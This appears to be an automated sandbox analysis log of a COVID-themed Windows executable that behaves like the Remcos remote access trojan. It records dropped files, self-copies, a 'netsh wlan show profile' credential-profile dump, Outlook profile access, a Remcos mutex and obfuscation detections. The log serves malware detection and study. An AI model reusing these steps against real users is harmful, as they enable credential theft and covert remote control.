Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe'
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 920
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe'
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 28_2_0040CA41
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004081B7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Mutant created: \Sessions\1\BaseNamedObjects\remcos_aqizussesx
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cldapi.pdb_6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb^? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdbb?r source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbd?x source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb(/ source: WerFault.exe, 00000022.00000003.442299112.0000000005532000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdbR?" source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb&?> source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: psapi.pdbL? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb=6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbJ? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb;6I source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, dwnl.exe.28.dr
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbc6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbx?t source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdbv? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdbo6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdbSHA256/ source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, dwnl.exe.28.dr
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbn?f source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb(?$ source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb@? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbT?( source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp

Data Obfuscation:

Yara detected Beds Obfuscator
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.842704.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2fcf496.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.dwnl.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2faeb92.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2f3f602.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.UK COVID UPDATES AND ENTITLEMENT.exe.2f5ff06.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.492777549.0000000000822000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464230298.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.424995684.0000000002ED1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432421502.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.464012145.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429908152.0000000002ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwnl.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwnl.exe, type: DROPPED
.NET source code contains method to dynamically call methods (often used by packers)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_00A381A4 push eax; iretd 0_2_00A381BF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_014747E9 push es; ret 0_2_014747EF
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 0_2_0147479C push esi; ret 0_2_0147479F
